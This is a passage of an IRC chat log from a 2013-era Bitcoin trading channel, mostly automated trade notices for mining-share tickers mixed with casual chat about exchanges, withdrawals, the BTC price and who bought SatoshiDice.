19:32:24 [BTCTC] [AMC-PT] 50 @ 0.0032 = 0.16 BTC [-] Jul 19 19:32:27 [BTCTC] [AMC-PT] 950 @ 0.0032 = 3.04 BTC [-] Jul 19 19:33:09 [BTCTC] [AMC-PT] 900 @ 0.0032 = 2.88 BTC [-] Jul 19 19:33:27 [BTCTC] [AMC-PT] 7 @ 0.00311 = 0.0218 BTC [-] Jul 19 19:33:28 [BTCTC] [AMC-PT] 1 @ 0.0031 BTC [-] Jul 19 19:33:30 [BTCTC] [AMC-PT] 1000 @ 0.00298 = 2.98 BTC [-] Jul 19 19:34:00 [HAVELOCK] [AM100] 1 @ 0.045747 BTC [+] Jul 19 19:34:16 [BTCTC] [AMC-PT] 25 @ 0.00298 = 0.0745 BTC [-] Jul 19 19:34:38 [BTCTC] [AMC-PT] 1 @ 0.002719 BTC [-] Jul 19 19:34:40 [BTCTC] [AMC-PT] 1 @ 0.0027 BTC [-] Jul 19 19:34:41 [BTCTC] [AMC-PT] 65 @ 0.00262 = 0.1703 BTC [-] Jul 19 19:35:32 [BTCTC] [BASIC-MINING] 3 @ 0.695301 = 2.0859 BTC [-] Jul 19 19:35:34 [BTCTC] [BASIC-MINING] 6 @ 0.6953 = 4.1718 BTC [-] Jul 19 19:35:35 [BTCTC] [BASIC-MINING] 6 @ 0.6952 = 4.1712 BTC [-] Jul 19 19:35:37 [BTCTC] [BASIC-MINING] 12 @ 0.69515 = 8.3418 BTC [-] Jul 19 19:37:05 [HAVELOCK] [SMG] 992 @ 0.000329 = 0.3264 BTC [-] Jul 19 19:37:07 [HAVELOCK] [SMG] 8 @ 0.000305 = 0.0024 BTC [-] Jul 19 19:38:08 [BTCTC] [BFMINES] 5 @ 0.003998 = 0.02 BTC [+] Jul 19 19:38:59 [BTCTC] [AMC-PT] 724 @ 0.00299 = 2.1648 BTC [+] Jul 19 19:40:09 [BTCTC] [AMC-PT] 44 @ 0.002999 = 0.132 BTC [+] Jul 19 19:40:11 [BTCTC] [TAT.ASICMINER] 17 @ 0.0443 = 0.7531 BTC [-] Jul 19 19:40:44 [BTCTC] [TAT.ASICMINER] 23 @ 0.044201 = 1.0166 BTC [-] Jul 19 19:42:27 [BTCTC] [AMC-PT] 84 @ 0.002652 = 0.2228 BTC [-] Jul 19 19:42:29 [BTCTC] [AMC-PT] 1223 @ 0.002651 = 3.2422 BTC [-] Jul 19 19:42:31 [BTCTC] [AMC-PT] 4378 @ 0.00265 = 11.6017 BTC [-] Jul 19 19:42:34 [BTCTC] [AMC-PT] 550 @ 0.002999 = 1.6495 BTC [+] Jul 19 19:44:51 [HAVELOCK] [SMG] 800 @ 0.00033 = 0.264 BTC [+] Jul 19 19:48:45 [BTCTC] [AMC-PT] 100 @ 0.0028 = 0.28 BTC [-] Jul 19 19:49:58 [BTCTC] [ASICMINER-PT] 2 @ 4.21 = 8.42 BTC [-] Jul 19 19:50:23 [BTCTC] [DMS.MINING] 1 @ 0.016242 BTC [-] Jul 19 19:52:09 [BTCTC] [PAJKA.BOND] 40 @ 0.042038 = 1.6815 BTC [+] Jul 19 19:52:47 [BTCTC] [AMC-PT] 985 @ 0.0028 = 2.758 BTC [-] Jul 19 19:55:52 [BTCTC] [AMC-PT] 14 @ 0.002898 = 0.0406 BTC [+] Jul 19 20:00:39 [BTCTC] [S.MPOE-PT] 1 @ 0.000882 BTC [+] Jul 19 20:05:53 Oooo EVE is on sale through Steam Jul 19 20:05:55 9.97 Jul 19 20:05:56 [HAVELOCK] [SMG] 417 @ 0.000305 = 0.1272 BTC [-] Jul 19 20:05:58 [HAVELOCK] [SMG] 22 @ 0.000305 = 0.0067 BTC [-] Jul 19 20:06:01 [HAVELOCK] [SMG] 5000 @ 0.0003 = 1.5 BTC [-] Jul 19 20:08:23 would it be possible to use bitpay as payout processor? i.e., register yourself as merchant and "buy your own stuff".. fast processing for a small premium Jul 19 20:08:24 [BTCTC] [TAT.ASICMINER] 2 @ 0.044203 = 0.0884 BTC [+] Jul 19 20:08:28 [BTCTC] [TAT.ASICMINER] 4 @ 0.044202 = 0.1768 BTC [-] Jul 19 20:08:31 [BTCTC] [TAT.ASICMINER] 1 @ 0.0442 BTC [-] Jul 19 20:08:33 [BTCTC] [TAT.ASICMINER] 18 @ 0.044001 = 0.792 BTC [-] Jul 19 20:09:17 [BTCTC] [AMC-PT] 150 @ 0.002891 = 0.4337 BTC [-] Jul 19 20:10:53 [BTCTC] [AMC-PT] 300 @ 0.002891 = 0.8673 BTC [-] Jul 19 20:12:20 [BTCTC] [BASIC-MINING] 1 @ 0.739999 BTC [+] Jul 19 20:14:46 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003801 = 0.038 BTC [-] Jul 19 20:14:56 Hmmmm, would that be double dipping as far as fees go? Jul 19 20:15:00 [BTCTC] [DMS.MINING] 10 @ 0.015151 = 0.1515 BTC [-] Jul 19 20:15:07 Are you just trying to find a faster payout processor? Jul 19 20:15:14 [HAVELOCK] [SMG] 1 @ 0.00033 BTC [+] Jul 19 20:15:40 no, i'm very happy with bitstamp, but in some special cases it could be useful Jul 19 20:16:17 [HAVELOCK] [HIM] 3 @ 0.271 = 0.813 BTC [+] Jul 19 20:16:24 just asking out of curiosity :) Jul 19 20:17:01 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0038 BTC [-] Jul 19 20:17:05 any known issues with blockchain.info today? Jul 19 20:17:16 [HAVELOCK] [HIM] 7 @ 0.271 = 1.897 BTC [+] Jul 19 20:17:46 [BTCTC] [TAT.VIRTUALMINE] 11 @ 0.003731 = 0.041 BTC [-] Jul 19 20:18:13 Would be the purpose of doing that though, just curious myself as well. Jul 19 20:18:29 [BTCTC] [TAT.VIRTUALMINE] 489 @ 0.003731 = 1.8245 BTC [-] Jul 19 20:18:30 [BTCTC] [AMC-PT] 800 @ 0.00275 = 2.2 BTC [-] Jul 19 20:18:32 [BTCTC] [TAT.VIRTUALMINE] 180 @ 0.003721 = 0.6698 BTC [-] Jul 19 20:18:34 [BTCTC] [TAT.VIRTUALMINE] 430 @ 0.003708 = 1.5944 BTC [-] Jul 19 20:19:42 [BTCTC] [AMC-PT] 450 @ 0.00271 = 1.2195 BTC [-] Jul 19 20:22:14 usagi: :( sent a transaction from their wallet online app, not apearing anywhere else yet Jul 19 20:22:15 [BTCTC] [AMC-PT] 50 @ 0.00271 = 0.1355 BTC [-] Jul 19 20:22:17 [BTCTC] [AMC-PT] 1 @ 0.002812 BTC [+] Jul 19 20:22:19 [BTCTC] [AMC-PT] 134 @ 0.002849 = 0.3818 BTC [+] Jul 19 20:22:23 ok, so i'm not the only one at least Jul 19 20:24:31 [HAVELOCK] [AM100] 2 @ 0.04470007 = 0.0894 BTC [-] Jul 19 20:26:39 [HAVELOCK] [SDSTM] 8 @ 0.0117 = 0.0936 BTC [-] Jul 19 20:27:44 [MPEX] [S.MPOE] 1600 @ 0.00088085 = 1.4094 BTC [-] Jul 19 20:28:56 hmm.. wondering if transactions can be exported and announced in another client Jul 19 20:31:35 [BTCTC] [AMC-PT] 40 @ 0.00282 = 0.1128 BTC [-] Jul 19 20:33:23 [HAVELOCK] [SMG] 100 @ 0.000329 = 0.0329 BTC [-] Jul 19 20:33:36 [HAVELOCK] [SMG] 100 @ 0.000329 = 0.0329 BTC [-] Jul 19 20:34:25 [BTCTC] [ASICMINER-PT] 1 @ 4.652001 BTC [+] Jul 19 20:34:49 [BTCTC] [TAT.ASICMINER] 50 @ 0.045199 = 2.26 BTC [+] Jul 19 20:34:51 [BTCTC] [TAT.ASICMINER] 24 @ 0.0452 = 1.0848 BTC [+] Jul 19 20:34:53 [BTCTC] [TAT.ASICMINER] 16 @ 0.045692 = 0.7311 BTC [+] Jul 19 20:34:54 [BTCTC] [TAT.ASICMINER] 4 @ 0.045693 = 0.1828 BTC [+] Jul 19 20:34:56 [BTCTC] [TAT.ASICMINER] 6 @ 0.045694 = 0.2742 BTC [+] Jul 19 20:35:10 [HAVELOCK] [SMG] 1 @ 0.000329 BTC [-] Jul 19 20:36:04 [HAVELOCK] [SMG] 500 @ 0.00031 = 0.155 BTC [-] Jul 19 20:36:06 [HAVELOCK] [SMG] 170 @ 0.0003 = 0.051 BTC [-] Jul 19 20:36:46 [HAVELOCK] [KCIM] 1 @ 0.8 BTC [-] Jul 19 20:36:50 [HAVELOCK] [SMG] 90 @ 0.000329 = 0.0296 BTC [+] Jul 19 20:38:09 [BTCTC] [AMC-PT] 5000 @ 0.0028 = 14 BTC [-] Jul 19 20:40:20 [HAVELOCK] [AM100] 1 @ 0.0447 BTC [-] Jul 19 20:40:30 [HAVELOCK] [SDSTM] 2 @ 0.01175 = 0.0235 BTC [+] Jul 19 20:40:33 [HAVELOCK] [SDSTM] 18 @ 0.01175 = 0.2115 BTC [+] Jul 19 20:41:55 [BTCTC] [RSM] 10 @ 0.01708 = 0.1708 BTC [-] Jul 19 20:41:57 [BTCTC] [RSM] 10 @ 0.017073 = 0.1707 BTC [-] Jul 19 20:41:58 [BTCTC] [RSM] 20 @ 0.017072 = 0.3414 BTC [-] Jul 19 20:42:42 [BTCTC] [COGNITIVE] 1 @ 0.754999 BTC [-] Jul 19 20:43:00 [BTCTC] [AMC-PT] 1000 @ 0.00269 = 2.69 BTC [-] Jul 19 20:43:02 [BTCTC] [AMC-PT] 400 @ 0.00268 = 1.072 BTC [-] Jul 19 20:43:04 [BTCTC] [AMC-PT] 850 @ 0.002652 = 2.2542 BTC [-] Jul 19 20:43:05 [BTCTC] [COGNITIVE] 2 @ 0.755 = 1.51 BTC [+] Jul 19 20:43:07 [BTCTC] [AMC-PT] 301 @ 0.002651 = 0.798 BTC [-] Jul 19 20:43:09 [BTCTC] [AMC-PT] 10000 @ 0.002651 = 26.51 BTC [-] Jul 19 20:43:11 [BTCTC] [AMC-PT] 10658 @ 0.00265 = 28.2437 BTC [-] Jul 19 20:43:13 [HAVELOCK] [AM100] 2 @ 0.0454 = 0.0908 BTC [+] Jul 19 20:43:51 [BTCTC] [COGNITIVE] 4 @ 0.76 = 3.04 BTC [+] Jul 19 20:44:06 [BTCTC] [AMC-PT] 178 @ 0.0028 = 0.4984 BTC [+] Jul 19 20:44:19 [BTCTC] [AMC-PT] 4164 @ 0.00265 = 11.0346 BTC [-] Jul 19 20:44:23 [BTCTC] [ASICMINER-PT] 1 @ 4.652001 BTC [+] Jul 19 20:44:25 [BTCTC] [ASICMINER-PT] 2 @ 4.652 = 9.304 BTC [-] Jul 19 20:44:27 [BTCTC] [ASICMINER-PT] 1 @ 4.651003 BTC [-] Jul 19 20:44:29 [BTCTC] [ASICMINER-PT] 2 @ 4.651002 = 9.302 BTC [-] Jul 19 20:44:31 [BTCTC] [ASICMINER-PT] 1 @ 4.651 BTC [-] Jul 19 20:44:33 [BTCTC] [ASICMINER-PT] 1 @ 4.651 BTC [-] Jul 19 20:44:35 [BTCTC] [ASICMINER-PT] 2 @ 4.6501 = 9.3002 BTC [-] Jul 19 20:45:09 [BTCTC] [ASICMINER-PT] 1 @ 4.71 BTC [+] Jul 19 20:45:18 [BTCTC] [AMC-PT] 4402 @ 0.0028 = 12.3256 BTC [+] Jul 19 20:46:00 [BTCTC] [AMC-PT] 50 @ 0.00279 = 0.1395 BTC [-] Jul 19 20:46:43 [BTCTC] [AMC-PT] 850 @ 0.002779 = 2.3622 BTC [-] Jul 19 20:46:45 [BTCTC] [AMC-PT] 450 @ 0.00279 = 1.2555 BTC [+] Jul 19 20:46:46 [BTCTC] [AMC-PT] 15200 @ 0.0028 = 42.56 BTC [+] Jul 19 20:47:34 [BTCTC] [AMC-PT] 1410 @ 0.0028 = 3.948 BTC [+] Jul 19 20:48:34 [BTCTC] [AMC-PT] 7700 @ 0.0028 = 21.56 BTC [+] Jul 19 20:50:17 [BTCTC] [AMC-PT] 3555 @ 0.0028 = 9.954 BTC [+] Jul 19 20:50:25 ping mircea_popescu Jul 19 20:50:56 Could you please process the withdrawals request? Got to pay out my PT holders. Jul 19 20:51:05 Thank you. Jul 19 20:51:12 [HAVELOCK] [AM100] 64 @ 0.045449 = 2.9087 BTC [+] Jul 19 20:54:20 [BTCTC] [AMC-PT] 350 @ 0.0028 = 0.98 BTC [+] Jul 19 20:54:54 [HAVELOCK] [AM100] 4 @ 0.045449 = 0.1818 BTC [+] Jul 19 20:55:16 [HAVELOCK] [AM100] 6 @ 0.045449 = 0.2727 BTC [+] Jul 19 20:57:35 [HAVELOCK] [SDSTM] 2 @ 0.0109 = 0.0218 BTC [-] Jul 19 20:57:38 [HAVELOCK] [SDSTM] 1 @ 0.0109 BTC [-] Jul 19 20:57:47 [HAVELOCK] [SMG] 90 @ 0.0003005 = 0.027 BTC [-] Jul 19 20:57:50 [HAVELOCK] [AM100] 8 @ 0.045449 = 0.3636 BTC [+] Jul 19 20:58:19 [HAVELOCK] [AM100] 11 @ 0.0447 = 0.4917 BTC [-] Jul 19 20:58:28 [HAVELOCK] [AM100] 1 @ 0.0447 BTC [-] Jul 19 20:58:36 [BTCTC] [AMC-PT] 65 @ 0.0028 = 0.182 BTC [+] Jul 19 20:58:45 [HAVELOCK] [VTX] 1 @ 0.55 BTC [-] Jul 19 20:59:05 [HAVELOCK] [SMG] 100 @ 0.000329 = 0.0329 BTC [+] Jul 19 21:00:04 [HAVELOCK] [AM100] 1 @ 0.045449 BTC [+] Jul 19 21:00:55 [BTCTC] [BFMINES] 92 @ 0.00355 = 0.3266 BTC [-] Jul 19 21:00:57 [BTCTC] [BFMINES] 3 @ 0.00355 = 0.0107 BTC [-] Jul 19 21:01:49 [BTCTC] [AMC-PT] 125 @ 0.0028 = 0.35 BTC [+] Jul 19 21:02:17 [BTCTC] [TAT.ASICMINER] 33 @ 0.0445 = 1.4685 BTC [-] Jul 19 21:02:35 hm Jul 19 21:02:46 foxnews wants to interview me lolwut Jul 19 21:03:00 what your connected to then? Jul 19 21:03:01 :) Jul 19 21:03:24 Belic family Jul 19 21:03:25 Foxnews? Jul 19 21:03:35 Belic? Jul 19 21:03:55 ;;google niko belic Jul 19 21:03:56 Niko Bellic - Wikipedia, the free encyclopedia: ; Niko Bellic - GTA Wiki, the Grand Theft Auto Wiki - GTA IV, San ...: ; Niko Belic (Speaking Serbian) - YouTube: Jul 19 21:05:57 I'm kind of lost there Jul 19 21:06:19 [BTCTC] [S.MPOE-PT] 2 @ 0.000882 = 0.0018 BTC [+] Jul 19 21:06:29 a bit of trollin i guess Jul 19 21:06:39 but yeah dunno, bitcoin related Jul 19 21:07:03 Seems probable... maybe Jul 19 21:07:23 ,oizotov: awake? Jul 19 21:07:46 ifgjf Jul 19 21:07:48 mircea_popescu: awake? Jul 19 21:08:42 [BTCTC] [AMC-PT] 4445 @ 0.0028 = 12.446 BTC [+] Jul 19 21:09:01 [BTCTC] [DMS.SELLING] 16 @ 0.022316 = 0.3571 BTC [-] Jul 19 21:09:03 [BTCTC] [DMS.SELLING] 100 @ 0.022315 = 2.2315 BTC [-] Jul 19 21:09:11 [BTCTC] [AMC-PT] 5500 @ 0.0028 = 15.4 BTC [+] Jul 19 21:09:48 [BTCTC] [AMC-PT] 700 @ 0.0028 = 1.96 BTC [+] Jul 19 21:10:19 [BTCTC] [GSDPT] 10 @ 0.003064 = 0.0306 BTC [-] Jul 19 21:10:24 [BTCTC] [AMC-PT] 180 @ 0.0028 = 0.504 BTC [+] Jul 19 21:10:28 [BTCTC] [AMC-PT] 125 @ 0.0028 = 0.35 BTC [+] Jul 19 21:12:27 [BTCTC] [COGNITIVE] 1 @ 0.758999 BTC [-] Jul 19 21:12:39 [BTCTC] [AMC-PT] 10 @ 0.0028 = 0.028 BTC [+] Jul 19 21:12:46 [BTCTC] [TAT.ASICMINER] 23 @ 0.044501 = 1.0235 BTC [+] Jul 19 21:12:56 [BTCTC] [AMC-PT] 350 @ 0.0028 = 0.98 BTC [+] Jul 19 21:12:59 [BTCTC] [COGNITIVE] 1 @ 0.759 BTC [+] Jul 19 21:13:57 [BTCTC] [AMC-PT] 361 @ 0.0028 = 1.0108 BTC [+] Jul 19 21:14:18 [BTCTC] [TAT.ASICMINER] 25 @ 0.044501 = 1.1125 BTC [+] Jul 19 21:14:31 [BTCTC] [COGNITIVE] 1 @ 0.759 BTC [+] Jul 19 21:15:47 [HAVELOCK] [AM100] 24 @ 0.0447001 = 1.0728 BTC [-] Jul 19 21:16:00 [HAVELOCK] [VTX] 2 @ 0.55 = 1.1 BTC [-] Jul 19 21:16:29 [BTCTC] [BFMINES] 497 @ 0.00355 = 1.7644 BTC [-] Jul 19 21:16:31 [BTCTC] [BFMINES] 88 @ 0.003542 = 0.3117 BTC [-] Jul 19 21:16:33 [BTCTC] [BFMINES] 30 @ 0.0035 = 0.105 BTC [-] Jul 19 21:16:50 [BTCTC] [TAT.ASICMINER] 2 @ 0.044501 = 0.089 BTC [+] Jul 19 21:18:35 [BTCTC] [AMC-PT] 10 @ 0.0028 = 0.028 BTC [+] Jul 19 21:20:33 [BTCTC] [TAT.ASICMINER] 4 @ 0.044501 = 0.178 BTC [+] Jul 19 21:20:35 [BTCTC] [TAT.ASICMINER] 8 @ 0.0445 = 0.356 BTC [-] Jul 19 21:20:36 [BTCTC] [AMC-PT] 1 @ 0.0028 BTC [+] Jul 19 21:20:58 [BTCTC] [BITVPS] 1 @ 0.001899 BTC [-] Jul 19 21:21:21 [BTCTC] [AMC-PT] 333 @ 0.0028 = 0.9324 BTC [+] Jul 19 21:21:50 [BTCTC] [AMC-PT] 1 @ 0.0028 BTC [+] Jul 19 21:22:53 Ukyo, apparently not. Jul 19 21:24:43 yup Jul 19 21:27:16 [BTCTC] [AMC-PT] 1 @ 0.002801 BTC [+] Jul 19 21:27:31 Could you please process the withdrawals request? Got to pay out my PT holders. -- MPEx is not allowing withdrawals? They are as bad as MtGox! Everybody PANIC!!!! Jul 19 21:28:16 withdrawals? depricated. Jul 19 21:28:20 [BTCTC] [TAT.ASICMINER] 15 @ 0.045595 = 0.6839 BTC [+] Jul 19 21:28:52 [BTCTC] [AMC-PT] 116 @ 0.002818 = 0.3269 BTC [+] Jul 19 21:29:05 [HAVELOCK] [AM100] 2 @ 0.0454 = 0.0908 BTC [+] Jul 19 21:29:15 [HAVELOCK] [AM100] 43 @ 0.045447 = 1.9542 BTC [+] Jul 19 21:29:23 [HAVELOCK] [AM100] 24 @ 0.045448 = 1.0908 BTC [+] Jul 19 21:29:51 lol, PeterL Jul 19 21:30:12 I kind of lodged my request late. And Mircea usually comes back around later in the day. Jul 19 21:31:03 BTC moving up in price against USD Jul 19 21:32:27 jborkl: really? I don't see much movement. Let us know when it gets back to 100 Jul 19 21:33:09 better than 88 Jul 19 21:40:15 [BTCTC] [AMC-PT] 216 @ 0.00279 = 0.6026 BTC [-] Jul 19 21:41:12 ;;ticker Jul 19 21:41:13 MtGox BTCUSD ticker | Best bid: 93.04501, Best ask: 93.50000, Bid-ask spread: 0.45499, Last trade: 93.04000, 24 hour volume: 25537.13639850, 24 hour low: 87.60000, 24 hour high: 95.05044, 24 hour vwap: 91.61592 Jul 19 21:41:58 [HAVELOCK] [AM100] 3 @ 0.04545 = 0.1364 BTC [+] Jul 19 21:42:00 [HAVELOCK] [AM100] 35 @ 0.04573 = 1.6006 BTC [+] Jul 19 21:42:03 [HAVELOCK] [AM100] 7 @ 0.045748 = 0.3202 BTC [+] Jul 19 21:42:05 [HAVELOCK] [AM100] 169 @ 0.0458 = 7.7402 BTC [+] Jul 19 21:42:07 [HAVELOCK] [AM100] 100 @ 0.04598 = 4.598 BTC [+] Jul 19 21:42:09 [HAVELOCK] [AM100] 36 @ 0.04599799 = 1.6559 BTC [+] Jul 19 21:42:26 [HAVELOCK] [AM100] 61 @ 0.04599799 = 2.8059 BTC [+] Jul 19 21:42:37 [HAVELOCK] [AM100] 30 @ 0.045997 = 1.3799 BTC [-] Jul 19 21:46:42 [HAVELOCK] [SDSTM] 7 @ 0.0109 = 0.0763 BTC [-] Jul 19 21:48:13 [BTCTC] [AMC-PT] 25 @ 0.002818 = 0.0705 BTC [+] Jul 19 21:48:50 [BTCTC] [DMS.MINING] 6 @ 0.016242 = 0.0975 BTC [+] Jul 19 21:49:50 [BTCTC] [ASICMINER-PT] 1 @ 4.6501 BTC [-] Jul 19 21:54:16 lol bakewell keeps his foursquare on and updates posted on twitter ... Jul 19 21:54:26 'catch me if you can' Jul 19 21:56:12 [BTCTC] [B.YABMC] 1 @ 0.002512 BTC [+] Jul 19 22:08:46 can we get gribble to switch to bitstamp for the ticker? MtGox has been an outlier recently, I don't trust their price Jul 19 22:09:23 nah Jul 19 22:09:32 [BTCTC] [ASICMINER-PT] 10 @ 4.5 = 45 BTC [-] Jul 19 22:09:44 kakobrekla, what... Jul 19 22:09:49 [BTCTC] [AMC-PT] 949 @ 0.00281 = 2.6667 BTC [-] Jul 19 22:09:55 Silly bakewell Jul 19 22:10:03 [HAVELOCK] [AM100] 1 @ 0.045999 BTC [+] Jul 19 22:10:06 [HAVELOCK] [AM100] 1 @ 0.045999 BTC [+] Jul 19 22:10:12 he so cool with sock on the head Jul 19 22:10:36 [BTCTC] [BTC-TRADING-PT] 1 @ 0.9408 BTC [-] Jul 19 22:10:38 [BTCTC] [DMS.MINING] 22 @ 0.016242 = 0.3573 BTC [+] Jul 19 22:10:46 [BTCTC] [AMC-PT] 211 @ 0.00281 = 0.5929 BTC [-] Jul 19 22:11:12 http://scammer-ianbakewell.com/assets/ianbakewell_sock.jpg Jul 19 22:11:26 sock goes over the face not on top when you are robbing people stupid Jul 19 22:11:26 [BTCTC] [DMS.MINING] 9 @ 0.016243 = 0.1462 BTC [+] Jul 19 22:11:38 [BTCTC] [AMC-PT] 1000 @ 0.00281 = 2.81 BTC [-] Jul 19 22:12:58 [BTCTC] [AMC-PT] 200 @ 0.002818 = 0.5636 BTC [+] Jul 19 22:13:47 [BTCTC] [BFMINES] 2 @ 0.003998 = 0.008 BTC [+] Jul 19 22:14:15 [BTCTC] [S.BBET-PT] 4 @ 0.002019 = 0.0081 BTC [+] Jul 19 22:14:53 [HAVELOCK] [SMG] 100 @ 0.000305 = 0.0305 BTC [-] Jul 19 22:14:56 [HAVELOCK] [SMG] 100 @ 0.000301 = 0.0301 BTC [-] Jul 19 22:14:57 [HAVELOCK] [SMG] 505 @ 0.00030005 = 0.1515 BTC [-] Jul 19 22:14:59 [HAVELOCK] [SMG] 323 @ 0.00030005 = 0.0969 BTC [-] Jul 19 22:15:01 [HAVELOCK] [SMG] 2500 @ 0.0003 = 0.75 BTC [-] Jul 19 22:15:39 whtas the s.mg float? how many outstanding shares? Jul 19 22:26:23 [BTCTC] [TAT.ASICMINER] 9 @ 0.045559 = 0.41 BTC [-] Jul 19 22:28:17 [BTCTC] [ASICMINER-PT] 2 @ 4.650101 = 9.3002 BTC [+] Jul 19 22:31:21 [BTCTC] [LTC-ATF.B2] 1 @ 0.00993 BTC [-] Jul 19 22:31:22 [BTCTC] [AMC-PT] 1950 @ 0.0028 = 5.46 BTC [-] Jul 19 22:32:16 [HAVELOCK] [SDSTM] 25 @ 0.0109 = 0.2725 BTC [-] Jul 19 22:32:18 [BTCTC] [AMC-PT] 3290 @ 0.002816 = 9.2646 BTC [+] Jul 19 22:32:48 [BTCTC] [AMC-PT] 60 @ 0.00275 = 0.165 BTC [-] Jul 19 22:32:50 [BTCTC] [AMC-PT] 330 @ 0.00271 = 0.8943 BTC [-] Jul 19 22:33:12 [BTCTC] [AMC-PT] 170 @ 0.00271 = 0.4607 BTC [-] Jul 19 22:33:14 [BTCTC] [AMC-PT] 10 @ 0.0027 = 0.027 BTC [-] Jul 19 22:33:16 [BTCTC] [AMC-PT] 25 @ 0.0027 = 0.0675 BTC [-] Jul 19 22:33:17 [BTCTC] [AMC-PT] 1500 @ 0.0027 = 4.05 BTC [-] Jul 19 22:33:19 [BTCTC] [AMC-PT] 13 @ 0.0027 = 0.0351 BTC [-] Jul 19 22:33:21 [BTCTC] [AMC-PT] 4441 @ 0.0027 = 11.9907 BTC [-] Jul 19 22:35:19 [HAVELOCK] [AM100] 7 @ 0.045 = 0.315 BTC [-] Jul 19 22:36:55 [BTCTC] [AMC-PT] 500 @ 0.0027 = 1.35 BTC [-] Jul 19 22:37:44 [BTCTC] [S.BBET-PT] 3 @ 0.0019 = 0.0057 BTC [-] Jul 19 22:38:36 [HAVELOCK] [AM1] 6 @ 4.65 = 27.9 BTC [-] Jul 19 22:39:17 [BTCTC] [LTC-ATF.B2] 23 @ 0.00992 = 0.2282 BTC [-] Jul 19 22:41:04 [BTCTC] [AMC-PT] 50 @ 0.002815 = 0.1408 BTC [+] Jul 19 22:41:14 topace_: S.MG has about 9000 btc from IPO at price 0.0001 Jul 19 22:41:33 so I think it is about 90000000 shares? Jul 19 22:42:12 http://bitbet.us/propositions/ 19-07-2013 Pending Satoshi Dice Bought by Mircea Popescu Jul 19 22:42:36 lol Jul 19 22:43:45 why do they never give a greason for rejecting bets? Jul 19 22:44:08 cause its a new feature Jul 19 22:44:11 never used before Jul 19 22:45:39 [HAVELOCK] [AM1] 4 @ 4.65 = 18.6 BTC [-] Jul 19 22:45:42 [HAVELOCK] [AM1] 1 @ 4.65 BTC [-] Jul 19 22:45:45 [BTCTC] [GSDPT] 4 @ 0.003064 = 0.0123 BTC [-] Jul 19 22:45:52 [HAVELOCK] [AM1] 1 @ 4.65 BTC [-] Jul 19 22:45:53 some say it's jez san Jul 19 22:46:40 [BTCTC] [AMC-PT] 4 @ 0.002808 = 0.0112 BTC [-] Jul 19 22:48:03 [HAVELOCK] [SMG] 30 @ 0.00032 = 0.0096 BTC [+] Jul 19 22:48:25 [BTCTC] [S.MPOE-PT] 1 @ 0.000882 BTC [+] Jul 19 22:50:00 lol holy shit Jul 19 22:50:17 went to https://www.facebook.com/JezSan Jul 19 22:50:22 and then to https://www.facebook.com/rebeccaliggero?fref=pb&hc_location=friends_tab Jul 19 22:50:29 his friends are joking about this xD Jul 19 22:50:52 [BTCTC] [AMC-PT] 225 @ 0.002807 = 0.6316 BTC [-] Jul 19 22:51:35 [BTCTC] [AMC-PT] 953 @ 0.00265 = 2.5255 BTC [-] Jul 19 22:51:44 Who's Jez San? Jul 19 22:52:49 [BTCTC] [AMC-PT] 1710 @ 0.002602 = 4.4494 BTC [-] Jul 19 22:54:01 https://fbcdn-sphotos-e-a.akamaihd.net/hphotos-ak-ash3/q71/944505_10151547371627807_365783252_n.jpg Jul 19 22:54:05 Silly name.com Jul 19 22:54:27 www.pkr.com Jul 19 22:54:32 he is the owner Jul 19 22:54:45 [BTCTC] [AMC-PT] 1650 @ 0.00265 = 4.3725 BTC [+] Jul 19 22:55:14 http://www.reddit.com/r/Bitcoin/comments/1ilitv/im_999_sure_i_know_who_bought_satoshidicecom_and/ Jul 19 22:55:18 I'm 99.9% sure I know who bought SatoshiDice.com and I'm willing to 'bet' on it : Bitcoin Jul 19 22:57:50 [BTCTC] [AMC-PT] 193 @ 0.002602 = 0.5022 BTC [-] Jul 19 22:58:07 well I'm 51% sure MP bought it Jul 19 22:59:16 [BTCTC] [AMC-PT] 200 @ 0.002602 = 0.5204 BTC [-] Jul 19 23:00:32 [BTCTC] [AMC-PT] 12 @ 0.002648 = 0.0318 BTC [+] Jul 19 23:01:23 [BTCTC] [AMC-PT] 147 @ 0.002648 = 0.3893 BTC [+] Jul 19 23:01:25 [BTCTC] [AMC-PT] 53 @ 0.002649 = 0.1404 BTC [+] Jul 19 23:02:15 [HAVELOCK] [HIM] 1 @ 0.272 BTC [+] Jul 19 23:02:22 [BTCTC] [AMC-PT] 5 @ 0.002649 = 0.0132 BTC [+] Jul 19 23:04:02 [BTCTC] [S.MPOE-PT] 2 @ 0.000882 = 0.0018 BTC [+] Jul 19 23:05:17 [HAVELOCK] [SMG] 8 @ 0.00029101 = 0.0023 BTC [-] Jul 19 23:05:24 [HAVELOCK] [SMG] 792 @ 0.000291 = 0.2305 BTC [-] Jul 19 23:06:30 [BTCTC] [AMC-PT] 2 @ 0.002649 = 0.0053 BTC [+] Jul 19 23:08:13 [BTCTC] [AMC-PT] 5 @ 0.002649 = 0.0132 BTC [+] Jul 19 23:14:49 [BTCTC] [AMC-PT] 1500 @ 0.002602 = 3.903 BTC [-] Jul 19 23:14:50 [HAVELOCK] [AM100] 20 @ 0.045997 = 0.9199 BTC [+] Jul 19 23:17:24 http://www.aljazeera.com/news/americas/2013/07/2013719191832593143.html Jul 19 23:17:28 Judge orders Detroit to pull bankruptcy bid - Americas - Al Jazeera English Jul 19 23:19:26 [HAVELOCK] [SMG] 89 @ 0.00032 = 0.0285 BTC [+] Jul 19 23:21:44 [BTCTC] [COGNITIVE] 1 @ 0.740001 BTC [-] Jul 19 23:21:46 [BTCTC] [AMC-PT] 3935 @ 0.002649 = 10.4238 BTC [+] Jul 19 23:22:16 [BTCTC] [COGNITIVE] 1 @ 0.74 BTC [-] Jul 19 23:23:12 [HAVELOCK] [AM100] 10 @ 0.045997 = 0.46 BTC [+] Jul 19 23:23:28 [HAVELOCK] [AM100] 20 @ 0.045997 = 0.9199 BTC [+] Jul 19 23:24:12 [HAVELOCK] [AM100] 1 @ 0.045999 BTC [+] Jul 19 23:26:41 [HAVELOCK] [AM100] 3 @ 0.045999 = 0.138 BTC [+] Jul 19 23:26:52 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00371 BTC [+] Jul 19 23:27:26 [HAVELOCK] [SDSTM] 3 @ 0.0109 = 0.0327 BTC [-] Jul 19 23:27:43 [BTCTC] [TAT.VIRTUALMINE] 6 @ 0.00361 = 0.0217 BTC [-] Jul 19 23:27:49 [HAVELOCK] [AM100] 1 @ 0.045999 BTC [+] Jul 19 23:28:18 [HAVELOCK] [SMG] 22 @ 0.00032 = 